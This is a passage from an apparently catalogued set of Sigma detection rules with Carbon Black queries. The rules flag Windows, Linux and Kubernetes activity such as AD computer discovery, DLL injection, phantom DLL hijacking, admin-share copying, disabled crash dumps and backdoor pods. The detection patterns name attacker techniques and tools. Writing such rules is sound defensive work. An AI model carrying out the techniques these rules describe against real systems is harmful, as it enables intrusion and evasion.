modified: 2022-11-17
tags:
    - attack.discovery
    - attack.t1033
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - 'Get-ADComputer '
            - ' -Filter \*'
        CommandLine|contains:
            - ' > '
            - ' | Select '
            - 'Out-File'
            - 'Set-Content'
            - 'Add-Content'
    condition: all of selection_*
falsepositives:
    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
level: medium
Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
Level: medium · Quality: Strong · Alert volume: High FP
Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · Rule ID: db885529-903f-4c5d-9864-28fe199e6370
Carbon Black query:
(ScriptBlockText:Get\-ADComputer\ * ScriptBlockText:\ \-Filter\ \**) (ScriptBlockText:\ |\ Select\ * OR ScriptBlockText:Out\-File* OR ScriptBlockText:Set\-Content* OR ScriptBlockText:Add\-Content*)
Sigma YAML:
title: Computer Discovery And Export Via Get-ADComputer Cmdlet - PowerShell
id: db885529-903f-4c5d-9864-28fe199e6370
related:
    - id: 435e10e4-992a-4281-96f3-38b11106adde
      type: similar
status: test
description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file
references:
    - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html
    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
    - https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-11-17
tags:
    - attack.discovery
    - attack.t1033
logsource:
    product: windows
    category: ps_script
    definition: 'Requirements: Script Block Logging must be enabled'
detection:
    selection:
        ScriptBlockText|contains|all:
            - 'Get-ADComputer '
            - ' -Filter \*'
        ScriptBlockText|contains:
            - ' | Select '
            - 'Out-File'
            - 'Set-Content'
            - 'Add-Content'
    condition: selection
falsepositives:
    - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often
level: medium
Computer Password Change Via Ksetup.EXE
Level: medium · Quality: Moderate · Alert volume: High FP
Detects password change for the computer's domain account or host principal via "ksetup.exe"
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: tactic only · Rule ID: de16d92c-c446-4d53-8938-10aeef41c8b6
Carbon Black query:
(Image:\\ksetup.exe OR OriginalFileName:ksetup.exe) CommandLine:\ \/setcomputerpassword\ *
Sigma YAML:
title: Computer Password Change Via Ksetup.EXE
id: de16d92c-c446-4d53-8938-10aeef41c8b6
status: test
description: Detects password change for the computer's domain account or host principal via "ksetup.exe"
references:
    - https://twitter.com/Oddvarmoe/status/1641712700605513729
    - https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-04-06
tags:
    - attack.execution
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\ksetup.exe'
        - OriginalFileName: 'ksetup.exe'
    selection_cli:
        CommandLine|contains: ' /setcomputerpassword '
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
Computer System Reconnaissance Via Wmic.EXE
Level: medium · Quality: Moderate · Alert volume: High FP
Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
Status: test · Author: Nasreddine Bencherchali (Nextron Systems) · ATT&CK mapping: technique · Rule ID: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f
Carbon Black query:
(Image:\\wmic.exe OR OriginalFileName:wmic.exe) CommandLine:computersystem*
Sigma YAML:
title: Computer System Reconnaissance Via Wmic.EXE
id: 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f
status: test
description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.
references:
    - https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-09-08
modified: 2023-02-14
tags:
    - attack.discovery
    - attack.execution
    - attack.t1047
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        - Image|endswith: '\wmic.exe'
        - OriginalFileName: 'wmic.exe'
    selection_cli:
        CommandLine|contains: 'computersystem'
    condition: all of selection_*
falsepositives:
    - Unknown
level: medium
Conhost Spawned By Uncommon Parent Process
Level: medium · Quality: Strong · Alert volume: Medium FP
Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
Status: test · Author: Tim Rauch, Elastic (idea) · ATT&CK mapping: technique · Rule ID: cbb9e3d1-2386-4e59-912e-62f1484f7a89
Carbon Black query:
(Image:\\conhost.exe (ParentImage:\\explorer.exe OR ParentImage:\\lsass.exe OR ParentImage:\\regsvr32.exe OR ParentImage:\\rundll32.exe OR ParentImage:\\services.exe OR ParentImage:\\smss.exe OR ParentImage:\\spoolsv.exe OR ParentImage:\\svchost.exe OR ParentImage:\\userinit.exe OR ParentImage:\\wininit.exe OR ParentImage:\\winlogon.exe)) (-(ParentCommandLine:\-k\ apphost\ \-s\ AppHostSvc* OR ParentCommandLine:\-k\ imgsvc* OR ParentCommandLine:\-k\ localService\ \-p\ \-s\ RemoteRegistry* OR ParentCommandLine:\-k\ LocalSystemNetworkRestricted\ \-p\ \-s\ NgcSvc* OR ParentCommandLine:\-k\ NetSvcs\ \-p\ \-s\ NcaSvc* OR ParentCommandLine:\-k\ netsvcs\ \-p\ \-s\ NetSetupSvc* OR ParentCommandLine:\-k\ netsvcs\ \-p\ \-s\ wlidsvc* OR ParentCommandLine:\-k\ NetworkService\ \-p\ \-s\ DoSvc* OR ParentCommandLine:\-k\ wsappx\ \-p\ \-s\ AppXSvc* OR ParentCommandLine:\-k\ wsappx\ \-p\ \-s\ ClipSVC* OR ParentCommandLine:\-k\ wusvcs\ \-p\ \-s\ WaaSMedicSvc*)) (-(ParentCommandLine:C\:\\Program\ Files\ \(x86\)\\Dropbox\\Client\\* OR ParentCommandLine:C\:\\Program\ Files\\Dropbox\\Client\\*))
Sigma YAML:
title: Conhost Spawned By Uncommon Parent Process
id: cbb9e3d1-2386-4e59-912e-62f1484f7a89
status: test
description: Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.
references:
    - https://www.elastic.co/guide/en/security/current/conhost-spawned-by-suspicious-parent-process.html
author: Tim Rauch, Elastic (idea)
date: 2022-09-28
modified: 2025-03-06
tags:
    - attack.execution
    - attack.t1059
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\conhost.exe'
        ParentImage|endswith:
            - '\explorer.exe'
            # - '\csrss.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/csrss.exe
            # - '\ctfmon.exe'  # Seen several times in a testing environment
            # - '\dllhost.exe'  # FP on clean system from grandparent 'svchost.exe -k DcomLaunch -p'
            - '\lsass.exe'
            - '\regsvr32.exe'
            - '\rundll32.exe'
            - '\services.exe'
            - '\smss.exe'
            - '\spoolsv.exe'
            - '\svchost.exe'
            - '\userinit.exe'
            # - '\wermgr.exe'  # Legitimate parent as seen in EchoTrail https://www.echotrail.io/insights/search/wermgr.exe
            - '\wininit.exe'
            - '\winlogon.exe'
    filter_main_svchost:
        ParentCommandLine|contains:
            - '-k apphost -s AppHostSvc'
            - '-k imgsvc'
            - '-k localService -p -s RemoteRegistry'
            - '-k LocalSystemNetworkRestricted -p -s NgcSvc'
            - '-k NetSvcs -p -s NcaSvc'
            - '-k netsvcs -p -s NetSetupSvc'
            - '-k netsvcs -p -s wlidsvc'
            - '-k NetworkService -p -s DoSvc'
            - '-k wsappx -p -s AppXSvc'
            - '-k wsappx -p -s ClipSVC'
            - '-k wusvcs -p -s WaaSMedicSvc'
    filter_optional_dropbox:
        ParentCommandLine|contains:
            - 'C:\Program Files (x86)\Dropbox\Client\'
            - 'C:\Program Files\Dropbox\Client\'
    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*
falsepositives:
    - Unknown
level: medium
medium Strong Medium FP
Console CodePage Lookup Via CHCP
Detects use of chcp to look up the system locale value as part of host discovery
status test author _pete_0, TheDFIRReport ATT&CK sub-technique id 7090adee-82e2-4269-bd59-80691e7c6338
carbon_black query
ParentImage:\\cmd.exe (ParentCommandLine:\ \-c\ * OR ParentCommandLine:\ \/c\ * OR ParentCommandLine:\ –c\ * OR ParentCommandLine:\ —c\ * OR ParentCommandLine:\ ―c\ * OR ParentCommandLine:\ \-r\ * OR ParentCommandLine:\ \/r\ * OR ParentCommandLine:\ –r\ * OR ParentCommandLine:\ —r\ * OR ParentCommandLine:\ ―r\ * OR ParentCommandLine:\ \-k\ * OR ParentCommandLine:\ \/k\ * OR ParentCommandLine:\ –k\ * OR ParentCommandLine:\ —k\ * OR ParentCommandLine:\ ―k\ *) Image:\\chcp.com (CommandLine:chcp OR CommandLine:chcp\  OR CommandLine:chcp\ \ )
view Sigma YAML
title: Console CodePage Lookup Via CHCP
id: 7090adee-82e2-4269-bd59-80691e7c6338
status: test
description: Detects use of chcp to look up the system locale value as part of host discovery
references:
    - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/chcp
author: _pete_0, TheDFIRReport
date: 2022-02-21
modified: 2024-03-05
tags:
    - attack.discovery
    - attack.t1614.001
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\cmd.exe'
        ParentCommandLine|contains|windash:
            - ' -c '
            - ' -r '
            - ' -k '
        Image|endswith: '\chcp.com'
        CommandLine|endswith:
            - 'chcp'
            - 'chcp '
            - 'chcp  '
    condition: selection
falsepositives:
    - During an Anaconda update the 'conda.exe' process will eventually execute the 'chcp' command.
    - Discord was seen using chcp to look up code pages
level: medium
regression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_chcp_codepage_lookup/info.yml
medium Moderate High FP
ConvertTo-SecureString Cmdlet Usage Via CommandLine
Detects usage of the "ConvertTo-SecureString" cmdlet via the command line, which is fairly uncommon and could indicate potentially suspicious activity.
status test author Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton ATT&CK sub-technique id 74403157-20f5-415d-89a7-c505779585cf
carbon_black query
((Image:\\powershell.exe OR Image:\\pwsh.exe) OR (OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) CommandLine:ConvertTo\-SecureString*
view Sigma YAML
title: ConvertTo-SecureString Cmdlet Usage Via CommandLine
id: 74403157-20f5-415d-89a7-c505779585cf
status: test
description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity
references:
    - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
    - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples
author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton
date: 2020-10-11
modified: 2023-02-01
tags:
    - attack.stealth
    - attack.t1027
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith:
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains: 'ConvertTo-SecureString'
    condition: all of selection_*
falsepositives:
    - Legitimate use to pass password to different powershell commands
level: medium
medium Strong Medium FP
Copy From Or To Admin Share Or Sysvol Folder
Detects a copy command or a copy utility execution to or from an Admin share or remote
status test author Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali ATT&CK sub-technique id 855bc8b5-2ae8-402e-a9ed-b889e6df1900
carbon_black query
(CommandLine:\\\\*\\*$* OR CommandLine:\\Sysvol\\*) (((Image:\\robocopy.exe OR Image:\\xcopy.exe) OR (OriginalFileName:robocopy.exe OR OriginalFileName:XCOPY.EXE)) OR ((Image:\\cmd.exe OR OriginalFileName:Cmd.Exe) CommandLine:copy*) OR (((Image:\\powershell_ise.exe* OR Image:\\powershell.exe* OR Image:\\pwsh.exe*) OR (OriginalFileName:powershell_ise.exe OR OriginalFileName:PowerShell.EXE OR OriginalFileName:pwsh.dll)) (CommandLine:copy\-item* OR CommandLine:copy\ * OR CommandLine:cpi\ * OR CommandLine:\ cp\ * OR CommandLine:move\ * OR CommandLine:\ move\-item* OR CommandLine:\ mi\ * OR CommandLine:\ mv\ *)))
view Sigma YAML
title: Copy From Or To Admin Share Or Sysvol Folder
id: 855bc8b5-2ae8-402e-a9ed-b889e6df1900
status: test
description: Detects a copy command or a copy utility execution to or from an Admin share or remote
references:
    - https://twitter.com/SBousseaden/status/1211636381086339073
    - https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
    - https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html
    - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/
author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
date: 2019-12-30
modified: 2025-10-22
tags:
    - attack.lateral-movement
    - attack.collection
    - attack.exfiltration
    - attack.t1039
    - attack.t1048
    - attack.t1021.002
logsource:
    category: process_creation
    product: windows
detection:
    selection_target:
        CommandLine|contains:
            - '\\\\*\\*$' # example \\SVR_NAME\ADMIN$
            - '\Sysvol\'
    selection_other_tools:
        - Image|endswith:
              - '\robocopy.exe'
              - '\xcopy.exe'
        - OriginalFileName:
              - 'robocopy.exe'
              - 'XCOPY.EXE'
    selection_cmd_img:
        - Image|endswith: '\cmd.exe'
        - OriginalFileName: 'Cmd.Exe'
    selection_cmd_cli:
        CommandLine|contains: 'copy'
    selection_pwsh_img:
        - Image|contains:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'powershell_ise.exe'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_pwsh_cli:
        CommandLine|contains:
            - 'copy-item'
            - 'copy '
            - 'cpi '
            - ' cp '
            - 'move '
            - ' move-item'
            - ' mi '
            - ' mv '
    condition: selection_target and (selection_other_tools or all of selection_cmd_* or all of selection_pwsh_*)
falsepositives:
    - Administrative scripts
level: medium
medium Moderate Low FP
Crash Dump Created By Operating System
Detects "BugCheck" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file path, and report ID.
status experimental author Jason Mull ATT&CK sub-technique id 882fbe50-d8d7-4e29-ae80-0648a8556866
carbon_black query
Provider_Name:Microsoft\-Windows\-WER\-SystemErrorReporting EventID:1001
view Sigma YAML
title: Crash Dump Created By Operating System
id: 882fbe50-d8d7-4e29-ae80-0648a8556866
related:
    - id: 2ff692c2-4594-41ec-8fcb-46587de769e0
      type: similar
status: experimental
description: Detects "BugCheck" errors indicating the system rebooted due to a crash, capturing the bugcheck code, dump file path, and report ID.
references:
    - https://www.sans.edu/cyber-research/from-crash-compromise-unlocking-potential-windows-crash-dumps-offensive-security/
    - https://jasonmull.com/articles/offensive/2025-05-12-windows-crash-dumps-offensive-security/
author: Jason Mull
date: 2025-05-12
tags:
    - attack.credential-access
    - attack.collection
    - attack.t1003.002
    - attack.t1005
logsource:
    product: windows
    service: system
detection:
    selection:
        Provider_Name: 'Microsoft-Windows-WER-SystemErrorReporting'
        EventID: 1001
    condition: selection
level: medium
medium Moderate Medium FP
CrashControl CrashDump Disabled
Detects disabling the CrashDump per registry (as used by HermeticWiper)
status test author Tobias Michalski (Nextron Systems) ATT&CK technique id 2ff692c2-4594-41ec-8fcb-46587de769e0
carbon_black query
TargetObject:SYSTEM\\CurrentControlSet\\Control\\CrashControl* Details:DWORD\ \(0x00000000\)
view Sigma YAML
title: CrashControl CrashDump Disabled
id: 2ff692c2-4594-41ec-8fcb-46587de769e0
status: test
description: Detects disabling the CrashDump per registry (as used by HermeticWiper)
references:
    - https://www.sentinelone.com/labs/hermetic-wiper-ukraine-under-attack/
author: Tobias Michalski (Nextron Systems)
date: 2022-02-24
modified: 2023-08-17
tags:
    - attack.persistence
    - attack.stealth
    - attack.defense-impairment
    - attack.t1564
    - attack.t1112
logsource:
    product: windows
    category: registry_set
detection:
    selection:
        TargetObject|contains: 'SYSTEM\CurrentControlSet\Control\CrashControl'
        Details: 'DWORD (0x00000000)'
    condition: selection
falsepositives:
    - Legitimate disabling of crashdumps
level: medium
medium Moderate Medium FP
CreateRemoteThread API and LoadLibrary
Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
status test author Roberto Rodriguez @Cyb3rWard0g ATT&CK sub-technique id 052ec6f6-1adc-41e6-907a-f1c813478bee
carbon_black query
StartModule:\\kernel32.dll StartFunction:LoadLibraryA
view Sigma YAML
title: CreateRemoteThread API and LoadLibrary
id: 052ec6f6-1adc-41e6-907a-f1c813478bee
status: test
description: Detects potential use of CreateRemoteThread api and LoadLibrary function to inject DLL into a process
references:
    - https://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-08-11
modified: 2024-01-22
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055.001
    - detection.threat-hunting
logsource:
    product: windows
    category: create_remote_thread
detection:
    selection:
        StartModule|endswith: '\kernel32.dll'
        StartFunction: 'LoadLibraryA'
    condition: selection
falsepositives:
    - Unknown
level: medium
medium Moderate Medium FP
Created Files by Microsoft Sync Center
This rule detects suspicious files created by Microsoft Sync Center (mobsync)
status test author elhoim ATT&CK technique id 409f8a98-4496-4aaa-818a-c931c0a8b832
carbon_black query
Image:\\mobsync.exe (TargetFilename:.dll OR TargetFilename:.exe)
view Sigma YAML
title: Created Files by Microsoft Sync Center
id: 409f8a98-4496-4aaa-818a-c931c0a8b832
status: test
description: This rule detects suspicious files created by Microsoft Sync Center (mobsync)
references:
    - https://redcanary.com/blog/intelligence-insights-november-2021/
author: elhoim
date: 2022-04-28
modified: 2022-06-02
tags:
    - attack.privilege-escalation
    - attack.stealth
    - attack.t1055
    - attack.t1218
    - attack.execution
logsource:
    product: windows
    category: file_event
detection:
    selection_mobsync:
        Image|endswith: '\mobsync.exe'
    filter_created_file:
        TargetFilename|endswith:
            - '.dll'
            - '.exe'
    condition: selection_mobsync and filter_created_file
falsepositives:
    - Unknown
level: medium
medium Strong Low FP
Creation Of An User Account
Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
status test author Marie Euler, Pawel Mazur ATT&CK sub-technique id 759d0d51-bc99-4b5e-9add-8f5b2c8e7512
carbon_black query
(type:SYSCALL exe:\/useradd) OR type:ADD_USER
view Sigma YAML
title: Creation Of An User Account
id: 759d0d51-bc99-4b5e-9add-8f5b2c8e7512
status: test
description: Detects the creation of a new user account. Such accounts may be used for persistence that do not require persistent remote access tools to be deployed on the system.
references:
    - https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files
    - https://access.redhat.com/articles/4409591#audit-record-types-2
    - https://www.youtube.com/watch?v=VmvY5SQm5-Y&ab_channel=M45C07
author: Marie Euler, Pawel Mazur
date: 2020-05-18
modified: 2022-12-20
tags:
    - attack.t1136.001
    - attack.persistence
logsource:
    product: linux
    service: auditd
detection:
    selection_syscall_record_type:
        type: 'SYSCALL'
        exe|endswith: '/useradd'
    selection_add_user_record_type:
        type: 'ADD_USER' # This is logged without having to configure audit rules on both Ubuntu and Centos
    condition: 1 of selection_*
falsepositives:
    - Admin activity
level: medium
medium Moderate High FP
Creation Of Non-Existent System DLL
Detects creation of specific system DLL files that are usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes. Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs. Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.
status test author Nasreddine Bencherchali (Nextron Systems), fornotes ATT&CK sub-technique id df6ecb8b-7822-4f4b-b412-08f524b4576c
carbon_black query
TargetFilename:\:\\Windows\\System32\\axeonoffhelper.dll OR TargetFilename:\:\\Windows\\System32\\cdpsgshims.dll OR TargetFilename:\:\\Windows\\System32\\oci.dll OR TargetFilename:\:\\Windows\\System32\\offdmpsvc.dll OR TargetFilename:\:\\Windows\\System32\\shellchromeapi.dll OR TargetFilename:\:\\Windows\\System32\\TSMSISrv.dll OR TargetFilename:\:\\Windows\\System32\\TSVIPSrv.dll OR TargetFilename:\:\\Windows\\System32\\wbem\\wbemcomn.dll OR TargetFilename:\:\\Windows\\System32\\WLBSCTRL.dll OR TargetFilename:\:\\Windows\\System32\\wow64log.dll OR TargetFilename:\:\\Windows\\System32\\WptsExtensions.dll OR TargetFilename:\\SprintCSP.dll
view Sigma YAML
title: Creation Of Non-Existent System DLL
id: df6ecb8b-7822-4f4b-b412-08f524b4576c
related:
    - id: 6b98b92b-4f00-4f62-b4fe-4d1920215771 # ImageLoad rule
      type: similar
status: test
description: |
    Detects creation of specific system DLL files that are  usually not present on the system (or at least not in system directories) but may be loaded by legitimate processes.
    Phantom DLL hijacking involves placing malicious DLLs with names of non-existent system binaries in locations where legitimate applications may search for them, leading to execution of the malicious DLLs.
    Thus, the creation of such DLLs may indicate preparation for phantom DLL hijacking attacks.
references:
    - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html
    - https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/
    - https://decoded.avast.io/martinchlumecky/png-steganography/
    - https://github.com/blackarrowsec/redteam-research/tree/26e6fc0c0d30d364758fa11c2922064a9a7fd309/LPE%20via%20StorSvc
    - https://github.com/Wh04m1001/SysmonEoP
    - https://itm4n.github.io/cdpsvc-dll-hijacking/
    - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
    - https://securelist.com/passiveneuron-campaign-with-apt-implants-and-cobalt-strike/117745/
    - https://www.crowdstrike.com/en-us/blog/4-ways-adversaries-hijack-dlls/
    - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
    - https://www.hexacorn.com/blog/2025/06/14/wermgr-exe-boot-offdmpsvc-dll-lolbin/
    - https://www.hexacorn.com/blog/2025/06/14/wpr-exe-boottrace-phantom-dll-axeonoffhelper-dll-lolbin/
    - https://x.com/0gtweet/status/1564131230941122561
author: Nasreddine Bencherchali (Nextron Systems), fornotes
date: 2022-12-01
modified: 2026-01-24
tags:
    - attack.persistence
    - attack.privilege-escalation
    - attack.execution
    - attack.stealth
    - attack.t1574.001
logsource:
    product: windows
    category: file_event
detection:
    selection:
        TargetFilename|endswith:
            - ':\Windows\System32\axeonoffhelper.dll'
            - ':\Windows\System32\cdpsgshims.dll'
            - ':\Windows\System32\oci.dll'
            - ':\Windows\System32\offdmpsvc.dll'
            - ':\Windows\System32\shellchromeapi.dll'
            - ':\Windows\System32\TSMSISrv.dll'
            - ':\Windows\System32\TSVIPSrv.dll'
            - ':\Windows\System32\wbem\wbemcomn.dll'
            - ':\Windows\System32\WLBSCTRL.dll'
            - ':\Windows\System32\wow64log.dll'
            - ':\Windows\System32\WptsExtensions.dll'
            - '\SprintCSP.dll'
    condition: selection
falsepositives:
    - Unknown
level: medium
regression_tests_path: regression_data/rules/windows/file/file_event/file_event_win_create_non_existent_dlls/info.yml
medium Moderate Low FP
Creation Of Pod In System Namespace
Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods. System pods, created by controllers such as Deployments or DaemonSets, have random suffixes in their names. Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection. Deployment of such a backdoor container, e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.
status test author Leo Tsaousis (@laripping) ATT&CK sub-technique id a80d927d-ac6e-443f-a867-e8d6e3897318
carbon_black query
verb:create "objectRef.resource":pods "objectRef.namespace":kube\-system
view Sigma YAML
title: Creation Of Pod In System Namespace
id: a80d927d-ac6e-443f-a867-e8d6e3897318
status: test
description: |
    Detects deployments of pods within the kube-system namespace, which could be intended to imitate system pods.
    System pods, created by controllers such as Deployments or DaemonSets have random suffixes in their names.
    Attackers can use this fact and name their backdoor pods as if they were created by these controllers to avoid detection.
    Deployment of such a backdoor container e.g. named kube-proxy-bv61v, could be attempted in the kube-system namespace alongside the other administrative containers.
references:
    - https://microsoft.github.io/Threat-Matrix-for-Kubernetes/techniques/Pod%20or%20container%20name%20similarily/
author: Leo Tsaousis (@laripping)
date: 2024-03-26
tags:
    - attack.stealth
    - attack.t1036.005
logsource:
    category: application
    product: kubernetes
    service: audit
detection:
    selection:
        verb: 'create'
        objectRef.resource: 'pods'
        objectRef.namespace: kube-system
    condition: selection
falsepositives:
    - System components such as daemon-set-controller and kube-scheduler also create pods in the kube-system namespace
level: medium
medium Strong Medium FP
Creation Of a Suspicious ADS File Outside a Browser Download
Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers
status test author frack113 ATT&CK tactic-only id 573df571-a223-43bc-846e-3f98da481eca
carbon_black query
(Contents:\[ZoneTransfer\]\ \ ZoneId=3* TargetFilename:\:Zone.Identifier (TargetFilename:.exe* OR TargetFilename:.scr* OR TargetFilename:.bat* OR TargetFilename:.cmd* OR TargetFilename:.docx* OR TargetFilename:.hta* OR TargetFilename:.jse* OR TargetFilename:.lnk* OR TargetFilename:.pptx* OR TargetFilename:.ps* OR TargetFilename:.reg* OR TargetFilename:.sct* OR TargetFilename:.vb* OR TargetFilename:.wsc* OR TargetFilename:.wsf* OR TargetFilename:.xlsx*)) (-(Image:\\brave.exe OR (Image:C\:\\Program\ Files\\Google\\Chrome\\Application\\chrome.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Google\\Chrome\\Application\\chrome.exe) OR (Image:C\:\\Program\ Files\\Mozilla\ Firefox\\firefox.exe OR Image:C\:\\Program\ Files\ \(x86\)\\Mozilla\ Firefox\\firefox.exe) OR (Image:C\:\\Program\ Files\ \(x86\)\\Internet\ Explorer\\iexplore.exe OR Image:C\:\\Program\ Files\\Internet\ Explorer\\iexplore.exe) OR Image:\\maxthon.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeWebView\\Application\\* OR Image:\\WindowsApps\\MicrosoftEdge.exe OR (Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\Edge\\Application\\msedge.exe OR Image:C\:\\Program\ Files\\Microsoft\\Edge\\Application\\msedge.exe)) OR ((Image:C\:\\Program\ Files\ \(x86\)\\Microsoft\\EdgeCore\\* OR Image:C\:\\Program\ Files\\Microsoft\\EdgeCore\\*) (Image:\\msedge.exe OR Image:\\msedgewebview2.exe)) OR Image:\\opera.exe OR Image:\\safari.exe OR Image:\\seamonkey.exe OR Image:\\vivaldi.exe OR Image:\\whale.exe OR (Image:C\:\\Program\ Files\\WindowsApps\\Microsoft.ScreenSketch_* Image:\\SnippingTool\\SnippingTool.exe TargetFilename:C\:\\Users\\* (TargetFilename:\\AppData\\Local\\Packages\\Microsoft.ScreenSketch_* TargetFilename:\\TempState\\Screenshot\ *) TargetFilename:.png\:Zone.Identifier)))
view Sigma YAML
title: Creation Of a Suspicious ADS File Outside a Browser Download
id: 573df571-a223-43bc-846e-3f98da481eca
status: test
description: Detects the creation of a suspicious ADS (Alternate Data Stream) file by software other than browsers
references:
    - https://www.bleepingcomputer.com/news/security/exploited-windows-zero-day-lets-javascript-files-bypass-security-warnings/
author: frack113
date: 2022-10-22
modified: 2023-06-12
tags:
    - attack.stealth
logsource:
    product: windows
    category: create_stream_hash
detection:
    selection:
        Contents|startswith: '[ZoneTransfer]  ZoneId=3'
        TargetFilename|endswith: ':Zone.Identifier'
        TargetFilename|contains:
            - '.exe'
            - '.scr'
            - '.bat'
            - '.cmd'
            - '.docx'
            - '.hta'
            - '.jse'
            - '.lnk'
            - '.pptx'
            - '.ps'
            - '.reg'
            - '.sct'
            - '.vb'
            - '.wsc'
            - '.wsf'
            - '.xlsx'
    filter_optional_brave:
        Image|endswith: '\brave.exe'
    filter_optional_chrome:
        Image:
            - 'C:\Program Files\Google\Chrome\Application\chrome.exe'
            - 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe'
    filter_optional_firefox:
        Image:
            - 'C:\Program Files\Mozilla Firefox\firefox.exe'
            - 'C:\Program Files (x86)\Mozilla Firefox\firefox.exe'
    filter_optional_ie:
        Image:
            - 'C:\Program Files (x86)\Internet Explorer\iexplore.exe'
            - 'C:\Program Files\Internet Explorer\iexplore.exe'
    filter_optional_maxthon:
        Image|endswith: '\maxthon.exe'
    filter_optional_edge_1:
        - Image|startswith: 'C:\Program Files (x86)\Microsoft\EdgeWebView\Application\'
        - Image|endswith: '\WindowsApps\MicrosoftEdge.exe'
        - Image:
              - 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe'
              - 'C:\Program Files\Microsoft\Edge\Application\msedge.exe'
    filter_optional_edge_2:
        Image|startswith:
            - 'C:\Program Files (x86)\Microsoft\EdgeCore\'
            - 'C:\Program Files\Microsoft\EdgeCore\'
        Image|endswith:
            - '\msedge.exe'
            - '\msedgewebview2.exe'
    filter_optional_opera:
        Image|endswith: '\opera.exe'
    filter_optional_safari:
